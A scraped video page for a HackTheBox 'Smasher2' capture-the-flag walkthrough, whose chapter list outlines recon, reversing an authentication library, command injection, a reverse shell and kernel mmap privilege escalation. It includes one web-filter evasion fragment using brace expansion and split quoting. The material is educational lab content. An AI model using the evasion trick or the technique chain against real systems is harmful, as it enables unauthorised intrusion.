Loading...

HackTheBox - Smasher2

15,436 views

Loading...

Loading...

Transcript

The interactive transcript could not be loaded.

Loading...

Rating is available when the video has been rented.
This feature is not available right now. Please try again later.
Published on Dec 28, 2019

00:58 - Begin of Recon
02:30 - Using Wireshark to see why Nmap said HTTP 403
06:15 - Running GoBuster to identify /backup
07:05 - Performing a DNZ Zone Transfer with dig axfr
08:50 - Manually playing with the login form to hunt for SQL Injection
10:50 - Downloading files out of /backup, opening auth.py with vim and ses.so with ghidra
16:42 - Examining /auth endpoint
18:10 - Examining ses.so in Ghidra
20:31 - Renaming variables from Ghidra's decompiler to try to make sense of the code
30:00 - Examining get_internal_usr and pwd to discover the bug
33:20 - Using GDB to debug python and step through ses.so, which makes analyzing decompiled code easier
36:50 - First time attaching the debugger - Seg faults for some reason.
38:30 - Attaching the debugger again, this time it works. Explaining important registers
39:00 - Stepping through the code trying to make sense of registers. This part may not make sense.
### The RDI Value in the STRCMP was from my python script calling ses.so -- RSI is what the program thinks the password is. So if in the Python Script I used ippsec:ippsec, then it would be STRCMP('ippsec','ippsec').
51:50 - Logging in with Administrator:Administrator and then looking at auth.py to see how the /api works
54:25 - Getting command execution
55:50 - Trying to get a Reverse Shell, discovering a WAF, identifying the bad characters
56:50 - Configuring burp to have a hotkey to "Issue Repeater Request" so we don't have to click send
57:18 - Tips to avoid a web filter/WAF ex: {echo,test}|{ba''se64,-''-d}
1:01:00 - Getting a reverse shell, then upgrading to a SSH Terminal by dropping SSH Key
1:05:05 - Running LinPEAS to identify paths to privesc
1:09:10 - Downloading the custom Linux Kernel Module: DHID then examine in Ghidra
1:12:00 - Looking at Snowscans blog to test the dev_read function
1:14:15 - Looking at the dev_mmap call
1:15:20 - Looking at MWR LAbs paper on insecure MMAP use in kernel modules
1:16:30 - Explaining what we are going to do - Rewrite credentials in memory
1:19:20 - Going over the first MMAP Call to map memory
1:21:05 - Setting a SSH CONFIG to make it easier to ssh and SCP into Smasher2
1:26:00 - Searching for a credential structure in memory
1:31:20 - Running GetUID to see if the cred structure we modified is ours, if not set it back
1:34:00 - Setting capabilities and running bash upon getting root
1:36:10 - Showing what would of happened if we did not revert credentials back to original.

Loading...

Advertisement
When autoplay is enabled, a suggested video will automatically play next.

Up next


to add this to Watch Later

Add to

Loading playlists...